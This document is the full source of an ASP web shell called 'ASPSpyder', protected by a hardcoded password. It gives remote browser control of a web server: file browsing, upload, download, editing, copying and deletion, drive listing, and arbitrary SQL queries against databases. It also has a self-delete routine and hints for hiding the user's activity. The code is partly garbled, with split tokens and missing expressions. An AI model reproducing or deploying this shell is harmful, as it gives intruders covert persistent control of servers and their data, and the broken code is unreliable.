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<% Function BufferContent(data) Dim strContent(64) Dim i ClearString strContent For i = 1 To LenB(data) AddString strContent,Chr(AscB(MidB(data,i,1))) Next BufferContent = fnReadString(strContent)

End Function Sub ClearString(part) Dim index For index = 0 to 64 part(index)="" Next End Sub Sub AddString(part,newString) Dim tmp Dim index part(0) = part(0) & newString If Len(part(0)) > 64 Then index=0 tmp="" Do tmp=part(index) & tmp part(index) = "" index = index + 1 Loop until part(index) = "" part(index) = tmp End If End Sub Function fnReadString(part) Dim tmp Dim index tmp = "" For index = 0 to 64 If part(index) <> "" Then tmp = part(index) & tmp End If Next FnReadString = tmp End Function Class FileUploader Public Files Private mcolFormElem Private Sub Class_Initialize() Set Files = Server.CreateObject("Scripting.Dictionary") Set mcolFormElem = Server.CreateObject("Scripting.Dictionary") End Sub Private Sub Class_Terminate() If IsObject(Files) Then Files.RemoveAll() Set Files = Nothing End If

If IsObject(mcolFormElem) Then mcolFormElem.RemoveAll() Set mcolFormElem = Nothing End If End Sub Public Property Get Form(sIndex) Form = "" If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.I tem(LCase(sIndex)) End Property Public Default Sub Upload() Dim biData, sInputName Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos Dim nPosFile, nPosBound biData = Request.BinaryRead(Request.TotalBytes) nPosBegin = 1 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) If (nPosEnd-nPosBegin) <= 0 Then Exit Sub vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin) nDataBoundPos = InstrB(1, biData, vDataBounds) Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteStrin g("--")) nPos = InstrB(nDataBoundPos, biData, CByteString("Conten t-Disposition")) nPos = InstrB(nPos, biData, CByteString("name=")) nPosBegin = nPos + 6 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)) ) sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd -nPosBegin)) nPosFile = InstrB(nDataBoundPos, biData, CByteString("fi lename=")) nPosBound = InstrB(nPosEnd, biData, vDataBounds) If nPosFile <> 0 And nPosFile < nPosBound Then Dim oUploadFile, sFileName Set oUploadFile = New UploadedFile nPosBegin = nPosFile + 10 nPosEnd = InstrB(nPosBegin, biData, CByteString (Chr(34))) sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) oUploadFile.FileName = Right(sFileName, Len(sFil eName)-InStrRev(sFileName, "\")) nPos = InstrB(nPosEnd, biData, CByteString("Cont ent-Type:")) nPosBegin = nPos + 14 nPosEnd = InstrB(nPosBegin, biData, CByteString( Chr(13))) oUploadFile.ContentType = CWideString(MidB(biDat a, nPosBegin, nPosEnd-nPosBegin)) nPosBegin = nPosEnd+4 nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 oUploadFile.FileData = MidB(biData, nPosBegin, n PosEnd-nPosBegin) If oUploadFile.FileSize > 0 Then Files.Add LCase (sInputName), oUploadFile Else

nPos = InstrB(nPos, biData, CByteString(Chr(13)) ) nPosBegin = nPos + 4 nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 If Not mcolFormElem.Exists(LCase(sInputName)) Th en mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosE nd-nPosBegin)) End If nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds) , biData, vDataBounds) Loop End Sub 'String to byte string conversion Private Function CByteString(sString) Dim nIndex For nIndex = 1 to Len(sString) CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1))) Next End Function 'Byte string to string conversion Private Function CWideString(bsString) Dim nIndex CWideString ="" For nIndex = 1 to LenB(bsString) CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)) ) Next End Function End Class Class UploadedFile Public ContentType Public FileName Public FileData Public Property Get FileSize() FileSize = LenB(FileData) End Property Public Sub SaveToDisk(sPath) Dim oFS, oFile Dim nIndex If sPath = "" Or FileName = "" Then Exit Sub If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\" Set oFS = Server.CreateObject("Scripting.FileSystemObject") If Not oFS.FolderExists(sPath) Then Exit Sub Set oFile = oFS.CreateTextFile(sPath & FileName, True) ' output mechanism modified for buffering oFile.Write BufferContent(FileData) oFile.Close End Sub Public Sub SaveToDatabase(ByRef oField) If LenB(FileData) = 0 Then Exit Sub If IsObject(oField) Then oField.AppendChunk FileData End If

End Sub End Class ' Create the FileUploader IF REQUEST.QueryString("upload")="@" THEN Dim Uploader, File Set Uploader = New FileUploader ' This starts the upload process Uploader.Upload() %> <html><title>ASPYDrvsInfo</title> <style> <!-A:link {font-style: text-decoration: none; color: #c8c8c8} A:visited {font-style: text-decoration: none; color: #777777} A:active {font-style: text-decoration: none; color: #ff8300} A:hover {font-style: text-decoration: cursor: hand; color: #ff8300} * {scrollbar-base-color:#777777; scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-facecolor:#505050; scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight -color:#303030;} input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:non e;border:1px solid #000000;} //--> </style> <body bgcolor=black text=white> <BR><BR><BR> <center><table bgcolor="#505050" cellpadding=4> <tr><td><Font face=arial size=-1>File upload Information:</font> </td></tr><tr><td bgcolor=black ><table> <% ' Check if any files were uploaded If Uploader.Files.Count = 0 Then Response.Write "File(s) not uploaded." Else ' Loop through the uploaded files For Each File In Uploader.Files.Items File.SaveToDisk Request.QueryString("txtpath") Response.Write "<TR><TD>&nbsp;</TD></TR><tr><td><font color=gray >File Uploaded: </font></td><td>" & File.FileName & "</td></tr>" Response.Write "<tr><td><font color=gray>Size: </font></td><td>" & Int(File.FileSize/1024)+1 & " kb</td></tr>" Response.Write "<tr><td><font color=gray>Type: </font></td><td>" & File.ContentType & "</td></tr>" Next End If %> <TR><TD>&nbsp;</TD></TR></table> </td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpa th=<%=Request.QueryString("txtpath")%>"><font face="webdings" title=" BACK " siz e=+2 >7</font></a></center> <% response.End() '---- XXX END IF '-------ON ERROR RESUME NEXT

Response.Buffer = True password = "asuabang" ' <---Your password here If request.querystring("logoff")="@" then session("shagman")="" ' Logged off session("dbcon")="" ' Database Connection session("txtpath")="" ' any pathinfo end if If (session("shagman")<>password) and Request.form("code")="" Then %> <body bgcolor=black><center><BR><BR><BR><BR><FONT face=arial size=-2 color=#ff83 00>ADMINSTRATORS TOOLKIT</FONT><BR><BR><BR> <table><tr><td> <FORM method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" > <table bgcolor=#505050 width="20%" cellpadding=20 ><tr><td bgcolor=#303030 align =center > <INPUT type=password name=code ></td><td><INPUT name=submit type=submit value=" Access "> </td></tr></table> </td></tr><tr><td align=right> <font color=white size=-2 face=arial >ASPSpyder Apr2003</font></td></tr> </td></tr></table></FORM> <%If request.querystring("logoff")="@" then%> <font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClic k=window.close(this);>CLOSE THIS WINDOW</font> <%end if%> <center> <% Response.END End If If Request.form("code") = password or session("shagman") = password Then session("shagman") = password Else Response.Write "<BR><B><P align=center><font color=red ><b>ACCES S DENIED</B></font><BR><font color=Gray >Copyright 2003 Vela iNC.</font></p>" Response.END End If server.scriptTimeout=180 set fso = Server.CreateObject("Scripting.FileSystemObject") mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME")) mapPathLen = len(mapPath) if session(myScriptName) = "" then for x = mapPathLen to 0 step -1 myScriptName = mid(mapPath,x) if instr(1,myScriptName,"\")>0 then myScriptName = mid(mapPath,x+1) x=0 session(myScriptName) = myScriptName end if next Else myScriptName = session(myScriptName) end if wwwRoot = left(mapPath, mapPathLen - len(myScriptName))

Target = "D:\hshome\masterhr\\" ' ---Directory to which files will be DUMPED Too and From if len(Request.querystring("txtpath"))=3 then pathname = left(Request.querystring("txtpath"),2) & "\" & Reques t.form("Fname") else pathname = Request.querystring("txtpath") & "\" & Request.form(" Fname") end if If Request.Form("txtpath") = "" Then MyPath = Request.QueryString("txtpath") Else MyPath = Request.Form("txtpath") End If ' ---Path correction routine If len(MyPath)=1 then MyPath=MyPath & ":\" If len(MyPath)=2 then MyPath=MyPath & "\" If MyPath = "" Then MyPath = wwwRoot If not fso.FolderExists(MyPath) then Response.Write "<font face=arial size=+2>Non-existing path specified.<BR >Please use browser back button to continue !" Response.end end if set folder = fso.GetFolder(MyPath) if fso.GetFolder(Target) = false then Response.Write "<font face=arial size=-2 color=red>Please create your ta rget directory for copying files as it does not exist. </font><font face=arial s ize=-1 color=red>" & Target & "<BR></font>" else set fileCopy = fso.GetFolder(Target) end if If Not(folder.IsRootFolder) Then If len(folder.ParentFolder)>3 then showPath = folder.ParentFolder & "\" & Else showPath = folder.ParentFolder & End If Else showPath = left(MyPath,2) End If MyPath=showPath showPath=MyPath & "\" ' ---Path correction routine-DONE set drv=fso.GetDrive(left(MyPath,2)) if Request.Form("cmd")="Download" then if Request.Form("Fname")<>"" then Response.Buffer = True Response.Clear strFileName = Request.QueryString("txtpath") & "\" & Request.Form("Fname ")

Set Sys = Server.CreateObject( "Scripting.FileSystemObject" ) Set Bin = Sys.OpenTextFile( strFileName, 1, False ) Call Response.AddHeader( "Content-Disposition", "attachment; filename=" & Request.Form("Fname") ) Response.ContentType = "application/octet-stream" While Not Bin.AtEndOfStream Response.BinaryWrite( ChrB( Asc( Bin.Read( 1 ) ) ) ) Wend Bin.Close : Set Bin = Nothing Set Sys = Nothing Else err.number=500 err.description="Nothing selected for download..." End if End if %> <html> <style> <!-A:link {font-style: text-decoration: none; color: #c8c8c8} A:visited {font-style: text-decoration: none; color: #777777} A:active {font-style: text-decoration: none; color: #ff8300} A:hover {font-style: text-decoration: cursor: hand; color: #ff8300} * {scrollbar-base-color:#777777; scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-facecolor:#505050; scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight -color:#303030;} input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:non e;border:1px solid #000000;} //--> </style> <% 'QUERY ANALYSER -- START if request.QueryString("qa")="@" then '------------sub getTable(mySQL) if mySQL="" then exit sub end if on error resume next Response.Buffer = True Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFl ag myConnectionString=session("dbCon") Set myDBConnection = Server.CreateObject("ADODB.Connection") myDBConnection.Open myConnectionString myFlag = False myFlag = errChk() set rs = Server.CreateObject("ADODB.Recordset") rs.cursorlocation = 3 mySQL, myDBConnection myFlag = errChk() if"Asynchronous Rowset Processing") = 16 then For i = 0 To rs.Fields.Count - 1 myFields = myFields & "<TD><font color=#eeeeee size=2 fa ce=""Verdana, Arial, Helvetica, sans-serif"">" & rs.Fields(i).Name & "</font></T D>" Next

myTitle = "<font color=gray size=6 face=webdings>?</font ><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(" & rs.Reco rdCount & " row(s) affected)</TT><br>" rs.MoveFirst rs.PageSize=mNR if int(rs.RecordCount/mNR) < mPage then mPage=1 rs.AbsolutePage = mPage Response.Write myTitle & "</td><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp ;&nbsp;&nbsp;&nbsp;&nbsp;" if mPage=1 Then Response.Write("<input type=button name=btnPagePrev value="" << "" DISABLED>") else Response.Write("<input type=button name=btnPagePrev value= "" << "">") Response.Write "<select name=cmbPageSelect>" For x = 1 to rs.PageCount if x=mPage Then Response.Write("<option value=" & x & " SELECTED>" & x & "</option>") else Response.Write("<option value=" & x & ">" & x & "</option>") Next Response.Write "</select><input type=hidden name=mPage value=" & mPage & ">" if mPage = rs.PageCount Then Response.Write("<input type=button name=btnPageNext value="" >> "" DISABLED>") else Response.Write("<input type=button name=btnPa geNext value="" >> "">") Response.Write "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray>Displaying <input type=text size=" & Len(mNR) & " name=txtNoRecords value=" & mNR & "> records at a time.</font>" response.Write "</td><TABLE border=0 bgcolor=#999999 cellpadding =2><TR align=center valign=middle bgcolor=#777777>" & myFields For x = 1 to rs.PageSize If Not rs.EOF Then response.Write "<TR>" For i = 0 to rs.Fields.Count - 1 response.Write "<TD bgcolor=#dddddd>" & server.H TMLEncode(rs(i)) & "</TD>" Next response.Write "</TR>" response.Flush() rs.MoveNext Else x=rs.PageSize End If Next response.Write "</Table>" myFlag = errChk() else if not myFlag then myTitle = "<font color=#55ff55 size=6 face=webdings>i</f ont><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Qu ery results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The comm and(s) completed successfully.)</TT><br>" response.Write myTitle end if end if set myDBConnection = nothing set rs2 = nothing set rs = nothing End sub

sub getXML(mySQL) if mySQL="" then exit sub end if on error resume next Response.Buffer = True Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFl ag myConnectionString=session("dbCon") Set myDBConnection = Server.CreateObject("ADODB.Connection") myDBConnection.Open myConnectionString myFlag = False myFlag = errChk() set rs = Server.CreateObject("ADODB.Recordset") rs.cursorlocation = 3 mySQL, myDBConnection myFlag = errChk() if"Asynchronous Rowset Processing") = 16 then Response.Write "<font color=#55ff55 size=4 face=webdings>i</font ><font color=#cccccc> Copy paste this code and save as '.xml '</font></td></tr>< tr><td>" Response.Write "<textarea cols=75 name=txtXML rows=15>" rs.MoveFirst response.Write vbcrlf & "<?xml version=""1.0"" ?>" response.Write vbcrlf & "<TableXML>" Do While Not rs.EOF response.Write vbcrlf & "<Column>" For i = 0 to rs.Fields.Count - 1 response.Write vbcrlf & "<" & rs.Fields(i).Name & ">" & rs(i) & "</" & rs.Fields(i).Name & ">" & vbcrlf response.Flush() Next response.Write "</Column>" rs.MoveNext Loop response.Write "</TableXML>" response.Write "</textarea>" myFlag = errChk() else if not myFlag then myTitle = "<font color=#55ff55 size=6 face=webdings>i</f ont><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Qu ery results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The comm and(s) completed successfully.)</TT><br>" response.Write myTitle end if end if End sub Function errChk() if err.Number <> 0 and err.Number <> 13 then dim myText myText = "<font color=#ff8300 size=4 face=webdings>x</font><font color=red size=2 face=""Verdana, Arial, Helvetica, sans-serif""> " & err.Descri ption & "</font><BR>" response.Write myText err.Number = 0 errChk = True end if

end Function Dim myQuery,mPage,mNR myQuery = request.Form("txtSQL") if request.form("txtCon") <> "" then session("dbcon") = request.form("tx tCon") if request.QueryString("txtpath") then session("txtpath")=request.QueryS tring("txtpath") mPage=cint(request.Form("mPage")) if mPage<1 then mPage=1 mNR=cint(request.Form("txtNoRecords")) if mNR<1 then mNR=30 %> <html><title>ASPyQAnalyser</title> <script language="VbScript"> sub cmdSubmit_onclick if Document.frmSQL.txtSQL.value = "" then Document.frmSQL.txtSQL.value = "SELECT * FROM " & vbcrlf & "WHER E " & vbcrlf & "ORDER BY " exit sub end if Document.frmSQL.Submit end sub sub cmdTables_onclick Document.frmSQL.txtSQL.value = "select name as 'TablesListed' from sysob jects where xtype='U' order by name" Document.frmSQL.Submit end sub sub cmdColumns_onclick strTable =InputBox("Return Columns for which Table?","Table Name...") strTable = Trim(strTable) if len(strTable) > 0 Then SQL = "select name As 'ColumnName',xusertype As 'DataType',lengt h as Length from syscolumns where id=(select id from sysobjects where xtype='U' and name='" & strTable & "') order by name" Document.frmSQL.txtSQL.value = SQL Document.frmSQL.Submit End if end sub sub cmdClear_onclick Document.frmSQL.txtSQL.value = "" end sub sub cmdBack_onclick Document.Location = "<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath =<%=session("txtpath")%>" end sub Sub btnPagePrev_OnClick Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1 Document.frmSQL.Submit end sub Sub btnPageNext_OnClick Document.frmSQL.mPage.value = Document.frmSQL.mPage.value + 1 Document.frmSQL.Submit end sub Sub cmbPageSelect_onchange Document.frmSQL.mPage.value = (Document.frmSQL.cmbPageSelect.selectedInd ex + 1) Document.frmSQL.Submit End Sub Sub txtNoRecords_onclick

Document.frmSQL.cmbPageSelect.selectedIndex = 0 Document.frmSQL.mPage.value = 1 End Sub </script> <style> TR {font-family: sans-serif;} </style> <body bgcolor=black> <form name=frmSQL action="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@" meth od=Post> <table border="0"><tr> <td align=right><font color=#ff8300 size="4" face="webdings">@ </font><fon t color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">Paste your connection string here : </font><font color="#CCCCCC"> <input name=txtCon type="text" size="60" value="<%=session("dbcon")%>"> </font><BR> <textarea cols=75 name=txtSQL rows=4 wrap=PHYSICAL><%=myQuery%></textare a><BR> <input name=cmdSubmit type=button value=Submit><input name=cmdTables typ e=button value=Tables><input name=cmdColumns type=button value=Columns><input na me="reset" type=reset value=Reset><input name=cmdClear type=button value=Clear>< input name=cmdBack type=button value="Return"><input type="Checkbox" name="chkXM L" <%IF Request.Form("chkXML")= "on" tHEN Response.Write " checked " %>><font co lor="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">GenerateXML< /FONT> </td> <td>XXXXXX</td><td> <center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B>< font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by a SU_aBANG</TT></font></center> </td></tr></table> <table><tr><td><%If Request.Form("chkXML") = "on" Then getXML(myQuery) Else get Table(myQuery) %></td></tr></table></form> <HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><B R><font size=-1 color=gray>Cheers to <a href="">hA shish</a> for all the help!</font></p><BR> </body> </html> <% set myDBConnection = nothing set rs2 = nothing set rs = nothing '------------response.End() end if 'QUERY ANALYSER -- STOP %> <title><%=MyPath%></title> </head> <body bgcolor=black text=white topAprgin="0"> <!-- Copyright aSU_aBANG --> <% Response.Flush 'Code Optimisation START select case request.form("cmd") case "" If request.form("dirStuff")<>"" then Response.write "<font face=arial size=-2>You need to cli ck [Create] or [Delete] for folder operations to be</font>" Else

Response.Write "<font face=webdings size=+3 color=#ff830 0>&#1570;</font>" End If case " Copy " ' ---Copy From Folder routine Start If Request.Form("Fname")="" then Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\???</font><BR>" err.number=424 Else Response.Write "<font face=arial size=-2 color=#ff8300>C opying: " & Request.QueryString("txtpath") & "\" & Request.Form("Fname") & "</fo nt><BR>" fso.CopyFile Request.QueryString("txtpath") & "\" & Requ est.Form("Fname"),Target & Request.Form("Fname") Response.Flush End If ' ---Copy From Folder routine Stop case " Copy " ' ---Copy Too Folder routine Start If Request.Form("ToCopy")<>"" and Request.Form("ToCopy") <> "-----------------------------" Then Response.Write "<font face=arial size=-2 color=#ff8300>C opying: " & Request.Form("txtpath") & "\" & Request.Form("ToCopy") & "</font><BR >" Response.Flush fso.CopyFile Target & Request.Form("ToCopy"), Request.Fo rm("txtpath") & "\" & Request.Form("ToCopy") Else Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\???</font><BR>" err.number=424 End If ' ---Copy Too Folder routine Stop case "Delete" 'two of this if request.form("todelete")<>"" then ' ---File Delete start If (Request.Form("ToDelete")) = myScriptName then'(Right(Request .Servervariables("SCRIPT_NAME"),len(Request.Servervariables("SCRIPT_NAME"))-1)) Then Response.Write "<center><font face=arial size=-2 color=#ff8300>< BR><BR><HR>SELFDESTRUCT INITIATED...<BR>" Response.Flush fso.DeleteFile Request.Form("txtpath") & "\" & Request.F orm("ToDelete") %>+++DONE+++</font><BR><HR> <font color=gray size=-2 face=arial title="To av oid anyone from seeing what you were doing by using the browser back button."><s pan style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font> <%Response.End End If If Request.Form("ToDelete") <> "" and Request.Form("ToDelete") < > "------------------------------" Then Response.Write "<font face=arial size=-2 color=#ff8300>D eleting: " & Request.Form("txtpath") & "\" & Request.Form("ToDelete") & "</font> <BR>" Response.Flush fso.DeleteFile Request.Form("txtpath") & "\" & Request.F orm("ToDelete") Else

Response.Write "<font face=arial size=-2 color=#ff8300>D eleting: " & Request.Form("txtpath") & "\???</font><BR>" err.number=424 End If ' ---File Delete stop Else If request.form("dirStuff")<>"" then Response.Write "<font face=arial size=-2 color=#ff8300>D eleting folder...</font><BR>" fso.DeleteFolder MyPath & "\" & request.form("DirName") end if End If case "Edit/Create" %> <center><BR><table bgcolor="#505050" cellpadding="8"><tr> <td bgcolor="#000000" valign="bottom"> <Font face=arial SIZE=-2 color=#ff8300>NOTE: The following edit box mayn ot display special characters from files. Therefore the contents displayed mayno t be considered correct or accurate.</font> </td></tr><tr><td><TT>Path=> <%=pathname%><BR><BR> <% ' fetch file information Set f = fso.GetFile(pathname) %> file Type: <%=f.Type%><BR> file Size: <%=FormatNumber(f.size,0)%> bytes<BR> file Created: <%=FormatDateTime(f.datecreated,1)%>&nbsp;<%=FormatDateTime( created,3)%><BR> last Modified: <%=FormatDateTime(f.datelastmodified,1)%>&nbsp;<%=FormatDateTime( f.datelastmodified,3)%><BR> last Accessed: <%=FormatDateTime(f.datelastaccessed,1)%>&nbsp;<%=FormatDateTime( f.datelastaccessed,3)%><BR> file Attributes: <%=f.attributes%><BR> <% Set f = Nothing response.write "<center><FORM action=""" & Request.Servervariables("SCRI PT_NAME") & "?txtpath=" & MyPath & """ METHOD=""POST"">" 'read the file Set f = fso.OpenTextFile(pathname) If NOT f.AtEndOfStream Then fstr = f.readall f.Close Set f = Nothing Set fso = Nothing response.write "<TABLE><TR><TD>" & VBCRLF response.write "<FONT TITLE=""Use this text area to view or chan ge the contents of this document. Click [Save As] to store the updated contents to the web server."" FACE=arial SIZE=1 ><B>DOCUMENT CONTENTS</B></FONT><BR>" & V BCRLF response.write "<TEXTAREA NAME=FILEDATA ROWS=16 COLS=85 WRAP=OFF >" & Server.HTMLEncode(fstr) & "</TEXTAREA>" & VBCRLF response.write "</TD></TR></TABLE>" & VBCRLF %> <BR><center><TT>LOCATION <INPUT TYPE="TEXT" SIZE=48 MAXLENGTH=255 NAME="PATHNAME " VALUE="<%=pathname%>"> <INPUT TYPE="SUBMIT" NAME=cmd VALUE="Save As" TITLE="This write to the file spec ifed and overwrite it without warning."> <INPUT TYPE="SUBMIT" NAME="POSTACTION" VALUE="Cancel" TITLE="If you recieve an e rror while saving, then most likely you do not have write access OR the file att ributes are set to readonly !!"> </FORM></td></tr></table><BR>

<% response.end case "Create" Response.Write "<font face=arial size=-2 color=#ff8300>Creating folder...</font><BR>" fso.CreateFolder MyPath & "\" & request.form("DirName") case "Save As" Response.Write "<font face=arial size=-2 color=#ff8300>Saving fi le...</font><BR>" Set f = fso.CreateTextFile(Request.Form("pathname")) f.write Request.Form("FILEDATA") f.close end select 'Code Optimisation STOP ' ---DRIVES start here If request.querystring("getDRVs")="@" then %> <BR><BR><BR><center><table bgcolor="#505050" cellpadding=4> <tr><td><Font face=arial size=-1>Available Drive Information:</font> </td></tr><tr><td bgcolor=black > <table><tr><td><tt>Drive</td><td><tt>Type</td><td><tt>Path</td><td><tt>ShareName </td><td><tt>Size[MB]</td><td><tt>ReadyToUse</td><td><tt>VolumeLabel</td><td></t r> <%For Each thingy in fso.Drives%> <tr><td><tt> <%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi ngy.Path%> </td><td><tt> <%=thingy.ShareName%> </td><td><tt> <%=((thingy.TotalSi ze)/1024000)%> </td><td><tt> <%=thingy.IsReady%> </td><td><tt> <%=thingy.VolumeN ame%> <%Next%> </td></tr></table> </td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpa th=<%=MyPath%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></cent er> <% Response.end end if ' ---DRIVES stop here %> <HEAD> <SCRIPT Language="VBScript"> sub getit(thestuff) if right("<%=showPath%>",1) <> "\" Then document.myform.txtpath.value = "<%=showPath%>" & "\" & thestuff Else document.myform.txtpath.value = "<%=showPath%>" & thestuff End If document.myform.submit() End sub </SCRIPT> </HEAD> <% '---Report errors select case err.number case "0" response.write "<font face=webdings color=#55ff55>i</font> <font face=ar ial size=-2>Successfull..</font>"

case "58" response.write "<font face=arial size=-1 color=red>Folder already exists OR no folder name specified...</font>" case "70" response.write "<font face=arial size=-1 color=red>Permission Denied, fo lder/file is readonly or contains such files...</font>" case "76" response.write "<font face=arial size=-1 color=red>Path not found...</fo nt>" case "424" response.write "<font face=arial size=-1 color=red>Missing, Insufficient data OR file is readonly...</font>" case else response.write "<font face=arial size=-1 color=red>" & err.description & "</font>" end select '---Report errors end %> <center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font col or=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shag alot</TT></font></center> <font face=Courier> <table><tr><td> <form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" name="m yform" > <Table bgcolor=#505050 ><tr><td bgcolor=#505050 > <font face=Arial size=-2 color=#ff8300 > PATH INFO : </font></td><td align=right ><font face=Arial size=-2 color=#ff8300 >Volume Label:</font> <%=drv.VolumeName %> </td></tr> <tr><td colspan=2 cellpadding=2 bgcolor=#303030 ><font face=Arial size=-1 color= gray>Virtual: http://<%=Request.ServerVariables("SERVER_NAME")%><%=Request.Serve rvariables("SCRIPT_NAME")%></Font><BR><font face=wingdings color=Gray >1</font>< font face=Arial size=+1 > <%=showPath%></Font> <BR><input type=text width=40 size=60 name=txtpath value="<%=showPath%>" ><input type=submit name=cmd value=" View " > </td></tr></form></table> </td><td><center> <table bgcolor=#505050 cellpadding=4><tr><td bgcolor=black ><a href="<%=Request. Servervariables("SCRIPT_NAME")%>?getDRVs=@&txtpath=<%=MyPath%>"><font size=-2 fa ce=arial>Retrieve Available Network Drives</a></td></tr> <tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NA ME")%>?qa=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>SQL Query Analyser</A> </td></tr> <tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_N AME")%>?logoff=@&...thankyou.for.using.ASpyder....~sir_shagalot!..[shagzzz.cjb.n et]"><font size=-2 face=arial>+++LOGOFF+++</A></td></tr></table> </td></tr></table> <p align=center ><Table width=75% bgcolor=#505050 cellpadding=4 ><tr><td> <form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" ><font face=arial size=-1 >Delete file from current directory:</font><BR> <select size=1 name=ToDelete > <option>------------------------------</option>" <% fi=0 For each file in folder.Files

Response.Write "<option>" & & "</option>" fi=fi+1 next Response.Write "</select><input type=hidden name=txtpath value=""" & MyP ath & """><input type=Submit name=cmd value=Delete ></form></td><td>" Response.Write "<form method=post name=frmCopyFile action=""" & Request. Servervariables("SCRIPT_NAME") & """ ><font face=arial size=-1 >Copy file too cu rrent directory:</font><br><select size=1 name=ToCopy >" Response.Write "<option>------------------------------</option>" For each file in fileCopy.Files Response.Write "<option>" & & "</option>" next Response.Write "</select><input type=hidden name=txtpath value=""" & MyP ath & """><input type=Submit name=cmd value="" Copy "" ></form></td></tr></Tabl e>" Response.Flush ' ---View Tree Begins Here Response.Write "<table Cellpading=2 width=75% bgcolor=#505050 ><tr><td v align=top width=50% bgcolor=#303030 >Folders:<BR><BR>" fo=0 Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#c 8c8c8><span style='cursor: hand;' OnClick=""getit('..')"">..</span></FONT><BR>" For each fold in folder.SubFolders '-->FOLDERz fo=fo+1 Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#e eeeee><span style='cursor: hand;' OnClick=""getit('" & & "')"">" & fol & "</span></FONT><BR>" Next %> <BR><center><form method=post action="<%=Request.Servervariables("SCRIPT_NAME")% >?txtpath=<%=MyPath%>"> <table bgcolor=#505050 cellspacing=4><tr><td> <font face=arial size=-1 title="Create and Delete folders by entering their name s here manually.">Directory:</td></tr> <tr><td align=right ><input type=text size=20 name=DirName><BR> <input type=submit name=cmd value=Create><input type=submit name=cmd value=Delet e><input type=hidden name=DirStuff value=@> </tr></td></table></form> <% Response.Write "<BR></td><td valign=top width=50% bgcolor=#303030 >Files:<BR><BR >" Response.Flush %> <form method=post name=frmCopySelected action="<%=Request.Servervariable s("SCRIPT_NAME")%>?txtpath=<%=MyPath%>"> <% Response.write "<center><select name=Fname size=" & fi+3 & " style=""bac kground-color: rgb(48,48,48); color: rgb(210,210,210)"">" For each file in folder.Files '-->FILEz Response.Write "<option value=""" & & """>&nbsp;&nbsp;" & file .name & " -- [" & Int(file.size/1024)+1 & " kb]</option>" Next Response.write "</select>" Response.write "<br><input type=submit name=cmd value="" Copy ""><in put type=submit name=cmd value=""Edit/Create""><input type=submit name=cmd value =Download>" %> </form> <%

